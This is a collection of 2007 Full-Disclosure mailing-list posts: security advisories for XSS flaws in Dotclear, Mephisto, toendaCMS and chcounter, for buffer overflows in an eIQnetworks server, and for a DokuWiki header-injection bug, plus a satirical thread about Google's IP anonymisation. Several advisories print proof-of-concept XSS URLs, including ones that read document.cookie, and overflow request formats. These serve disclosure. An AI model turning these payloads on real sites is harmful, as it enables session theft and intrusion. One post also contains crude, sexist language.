CSCsg36361 , CSCsg15901, and CSCsh10841. Hard-Coded Service Password in Lightweight AP + The Cisco Aironet 1000 Series and 1500 Series Lightweight Access Points contain a hard-coded service password that is used for troubleshooting. This service account is only acc
Re: [Full-disclosure] Let's Winnuke Google!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [EMAIL PROTECTED] wrote: > [EMAIL PROTECTED] wrote: > > information that can be derived from an IP address.) I doubt that > > Google is a private company that generates revenue off of their > > targeted advertising expertise, and there is absolutely no > > legitimate value in this information to anyone. While it is > > acceptable to ignorantly profile based on ethnicity and > > nationality, it is not acceptable to analyze marketing statistics > > based on geographic location. No good can come from this! > > > Yawn, yawn and more yawn. Google is a publicly traded company. n3td3v - your losing your humor. the original posting at http://www.hackerfactor.com/blog/index.php?/archives/22-Lets-Help- Google.html is at least vaguely interesting. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYeXGoACgkQiDw0BWMaDTF2dgP+IMlGrFY9HlAZWMR4BiAHGlAsdZwX l3+/PMR8osCn/mObF4yNU+sDIMpiva2Jk9OQ2etBZ9fI3b/0e/Q+vi9jzAf3oWBYmP+r 3ihq7Qb/b8vmeXg+XpOBixi9Cfnh71F23htLaRU1PWZcFkMqVJ3dhh/7ZGlsRvNy0yEp Uq1y2ZY= =mqdM -END PGP SIGNATURE- -- Click for quotes on adjustable mortgages, 0 down, low rates http://tagline.hushmail.com/fc/CAaCXv1KXBUSgXMkvMyJQLKk1B5gqf1f/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability
Dotclear 1.* Cross Site Scripting Vulnerability 1--two cross site scripting vulnerabilities have been discovered in the dotclear1.* allowing a remote attackers to hijack authenticated session Workaround: $post_id (trackback.php) $tool_url(/tools/thememng/index.php) are not filtered 2-Proof of Concepts: dotclear/ecrire/trackback.php?post_id=">alert(document.cookie ); /ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng 3-Disclosure timeline 05/04/2007 dotclear team contacted 10/04/2007 fixed 4-solution: upgrade to dotclear 1.2.6 http://www.dotclear.net/ found by nassim http://www.securlabs.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INFIGO-2007-04-05: Enterprise Security Analyzer server remote buffer overflows
INFIGO IS Security Advisory #ADV-2007-04-01 http://www.infigo.hr/ Title: Enterprise Security Analyzer server remote buffer overflows Advisory ID: INFIGO-2007-08 Date: 2007-04-05 Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04 Impact: Remote code execution (preauth) Risk Level: High Vulnerability Type: Remote Vendors Status: Vendor contacted 8.2.2007 (first contact), Vendor contacted 19.2.2007 (second contact), Vendor contacted 28.3.2007 (no response) ==[ Overview Enterprise Security Analyzer (ESA) from eIQnetworks (http://www.eIQnetworks.com) is a Security Information Management (SIM) solution that provides security intelligence across the enterprise. ESA helps to simplify operations, protect IT assets and meet compliance mandates by combining multiple functionalities into a single solution. ==[ Vulnerability During an audit of Enterprise Security Analyzer, multiple remote buffer overflows have been discovered in the ESA server (TCP port 10616). There are various stack and heap overflows in multiple ESA requests. ESA protocol is a very simple plaintext homemade protocol where requests are sent in the following form: --- [REQUEST_COMMAND]&[ARG1]&[ARG2]&[ARG3]&[ARGn] --- (Note: remove '[' and ']') Ironically, Enterprise Security Analyzer is affected by various 'by the book' overflows in multiple request commands as listed below: - DELETESEARCHFOLDER stack overflow Request: [DELETESEARCHFOLDER&A x 4...&] - DELTASK heap overflow Request: [DELTASK&A x 3000...¤t&test&] - HMGR_CHECKHOSTSCSV heap overflow Request: [ HMGR_CHECKHOSTSCSV&A x 8...&] - TASKUPDATEDUSER heap overflow Request: [TASKUPDATEDUSER&A x 6...&test&test&] - VERIFYUSERKEY remote memory access violation Request: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345] - VERIFYPWD remote stack overflow (low risk - admin password needed) Request: [VERIFYPWD&A x 6000...&admin&adminpass&] ==[ Affected Version The vulnerability has been identified in the latest available Enterprise Security Analyzer v2.5. Previous versions are believed to be vulnerable as well. ==[ Fix No patch provided. ==[ PoC Exploit Not needed. ==[ Credits Vulnerability discovered by Leon Juranic <[EMAIL PROTECTED]>. ==[ INFIGO IS Security Contact INFIGO IS, WWW : http://www.infigo.hr E-mail : [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A Botted Fortune 500 a Day
Support Intelligence releases daily reports on different fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks. You can find more information on their blog: http://blog.support-intelligence.com/ They are good people, and they know botnets. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cross site scripting in mephisto 0.7.3
Cross site scripting in mephisto 0.7.3 security advisory References: http://www.mephistoblog.com http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1873 Description: Cross site scripting describes attacks that allow to insert malicious html or javascript code via get or post forms. This can be used to steal session cookies. mephisto is a rails-based blog application. The search function can be used to inject javascript code. Workaround/Fix: There's no vendor fix. Vendor has been contacted 2007-03-10 and replied that they were working on the issue. Sample injection URL: http://demo.mephistoblog.com/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E CVE Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1873 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright: This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed creative commons attribution: http://creativecommons.org/licenses/by/3.0/ Hanno Boeck, 2007-04-12, http://www.hboeck.de pgpXiJKHJKrgv.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3
Cross site scripting in toendaCMS 1.5.3 security advisory References: http://www.toendacms.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1872 Description: Cross site scripting describes attacks that allow to insert malicious html or javascript code via get or post forms. This can be used to steal session cookies. toendacms is a content management system. The search function can be used to inject javascript code. Workaround/Fix: There's no vendor fix. Vendor has been contacted 2007-03-11 and replied that they were working on the issue. Sample Code: http://toendainstallation/"; method="post"> CVE Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1872 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright: This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed creative commons attribution: http://creativecommons.org/licenses/by/3.0/ Hanno Boeck, 2007-04-12, http://www.hboeck.de pgpHNXo7mB4rq.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2007-1871: Cross site scripting in chcounter 3.1.3
Cross site scripting in chcounter 3.1.3 security advisory References: http://chcounter.org/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1871 Description: Cross site scripting describes attacks that allow to insert malicious html or javascript code via get or post forms. This can be used to steal session cookies. chcounter is some free software php script for website statistics. The login form on the start page can be used to insert javascript code. Workaround/Fix: There's no vendor fix. Vendor has been contacted 2007-03-11 and has not answered yet. Sample Code: http://chcounterinstallation/stats/> CVE Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1871 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright: This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed creative commons attribution: http://creativecommons.org/licenses/by/3.0/ Hanno Boeck, 2007-04-12, www.hboeck.de pgpKiqTDDxDfL.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200704-08 ] DokuWiki: Cross-site scripting vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200704-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: DokuWiki: Cross-site scripting vulnerability
Date: April 12, 2007
Bugs: #163781
ID: 200704-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
DokuWiki is vulnerable to a cross-site scripting attack.
Background
==
DokuWiki is a simple to use wiki aimed at creating documentation.
Affected packages
=
---
Package/ Vulnerable /Unaffected
---
1 www-apps/dokuwiki < 20061106 >= 20061106
Description
===
DokuWiki does not sanitize user input to the GET variable 'media' in
the fetch.php file.
Impact
==
An attacker could entice a user to click a specially crafted link and
inject CRLF characters into the variable. This would allow the creation
of new lines or fields in the returned HTTP Response header, which
would permit the attacker to execute arbitrary scripts in the context
of the user's browser.
Workaround
==
Replace the following line in lib/exe/fetch.php:
$MEDIA = getID('media',false); // no cleaning - maybe external
with
$MEDIA = preg_replace('/[\x00-\x1F]+/s','',getID('media',false));
Resolution
==
All DokuWiki users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20061106"
References
==
[ 1 ] CVE-2006-6965
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6965
Availability
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200704-08.xml
Concerns?
=
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
===
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Let's Winnuke Google!
Yah yah people will still use it! On 4/12/07, J. Oquendo <[EMAIL PROTECTED]> wrote: [EMAIL PROTECTED] wrote: > information that can be derived from an IP address.) I doubt that > Google is a private company that generates revenue off of their > targeted advertising expertise, and there is absolutely no > legitimate value in this information to anyone. While it is > acceptable to ignorantly profile based on ethnicity and > nationality, it is not acceptable to analyze marketing statistics > based on geographic location. No good can come from this! > Yawn, yawn and more yawn. Google is a publicly traded company. Your comments about targeted advertising based on geographic locations are wrong. If you own a ski supply company, what purpose would it serve to have ads dished out to people in I don't know say Las Vegas or Miami. As for the rest of this rambling... Old and inaccurate news. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Let's Winnuke Google!
[EMAIL PROTECTED] wrote: information that can be derived from an IP address.) I doubt that Google is a private company that generates revenue off of their targeted advertising expertise, and there is absolutely no legitimate value in this information to anyone. While it is acceptable to ignorantly profile based on ethnicity and nationality, it is not acceptable to analyze marketing statistics based on geographic location. No good can come from this! Yawn, yawn and more yawn. Google is a publicly traded company. Your comments about targeted advertising based on geographic locations are wrong. If you own a ski supply company, what purpose would it serve to have ads dished out to people in I don't know say Las Vegas or Miami. As for the rest of this rambling... Old and inaccurate news. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Let's Winnuke Google!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 For more than a decade, privacy advocates have been concerned about the information collected by public search engines. All of their concerns were realized last year, when AOL released nearly a quarter million search requests performed on their search engine. Although the data did not have IP addresses or user names, it did contain AOL tracking numbers. These allow people to match queries to users, and in many cases, identify individuals. Although AOL quickly removed the data, their reaction was too late. The data has been mirrored and is widely available. It seems that Google has begun to respond to privacy concerns. One common belief is that Google has saved every query from every IP address ever made on their massive system. In the official Google blog, they mentioned taking some steps to protect individual's privacy. As reported by Network World magazine: Google will alter cookie information and change the last eight bits of the 32-bit IP addresses that identify computers logged onto the company's search engine. Wow... So they will reduce the identity from one IP address to a possible 256 IP addresses. Gee, that sounds secure to me. Considering that IP addresses can be used to identify a very specific region, and that all 256 possible addresses are likely in the same part of the same city, identifying individuals would actually be easier with Google's data than with AOL's data! (AOL only gave a unique tracking number, not the country or city information that can be derived from an IP address.) I doubt that Google is a private company that generates revenue off of their targeted advertising expertise, and there is absolutely no legitimate value in this information to anyone. While it is acceptable to ignorantly profile based on ethnicity and nationality, it is not acceptable to analyze marketing statistics based on geographic location. No good can come from this! I am a huge privacy advocate, and strongly encourage readers of this article to start using The Electronic Frontier Foundation's TOR for anonymity's sake, to prevent evil corporations like Google from generating revenue off their otherwise free service to you, the casual netizen. However, please do not use TOR to read my blog! I must know the location of each blog reader, since I am such a huge Internet privacy advocate! :-) ] Adding to the humor of this less-than-secure solution, Google's blog says: Our engineers are already busy working out the technical details, and we hope to implement this new data policy over the coming months (and within a year's time). I think we should help Google solve this problem. Which do you think is more secure? * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x * 192.168.15.xx * 192.168.15.xxx * 192.168.15. * 192.168.15.x or, perhaps: * 192.168.15.abcdefghijklmnopqrstuvwxyz ? Send your fecal excretions to Privacy Matters, c/o Google Inc., 1600 Amphitheatre Parkway, Mountain View, California, 94043, USA. And remember, "Do No Evil" is not the same as "Don't Act Stupid", and certainly not the same as "Don't Fuck Fat Chicks". - - ^d0c_n34l^ [HFG/gH/ILF/ACiD/MoD/TaMU] -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYeLPoACgkQDpFP8dW5K4awwQP/c5ILaIBKHPwwneiL/tk+YUYTQWUI rRhpqExWxGZnfYwBG8eZRoKgIZSr6f+KaiFaT5cGFJ57PfXq2o3yqm0c5af5Z8K5Ch/w GfGUjAmyhq23eoI9BjyKGPlXsAgu57wBhy+kkZdpjLov9EHl/FeOQ2X3kIOtsqKJ7spI PL1r3Ts= =0UgV -END PGP SIGNATURE- -- Click for free estimate on vinyl siding, 200% stronger & lower cost http://tagline.hushmail.com/fc/CAaCXv1SJEHSwqHohStIXwDGx75NNAPg/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
